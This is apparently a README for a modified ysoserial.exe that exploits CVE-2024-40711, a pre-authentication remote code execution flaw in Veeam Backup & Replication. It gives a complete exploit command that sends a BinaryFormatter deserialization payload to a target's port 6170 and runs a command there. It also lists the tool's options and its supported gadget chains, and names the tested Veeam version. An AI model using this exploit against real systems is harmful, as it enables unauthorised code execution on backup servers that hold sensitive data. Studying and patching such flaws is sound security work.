Usages
.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"Usage: ysoserial.exe [options]
Options:
--vi, --targetveeamip=VALUE
The target Veeam Backup and reaplication IP
address
--vp, --targetveeamport=VALUE
The target Veeam Backup and reaplication port
(default: 6170)
--vc, --veeamexpcmd=VALUE
The target Veeam Backup and reaplication what
commands will be executed
--vg, --veeamgadget=VALUE
The target Veeam Backup and reaplication what
gadget will be use (default: DataSet)
Other gadget
Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfoBut you must use Gadget to support SOAPFORMATTER
Test environment
Veeam Backup 12.1.1.56
Reference
watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)
Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)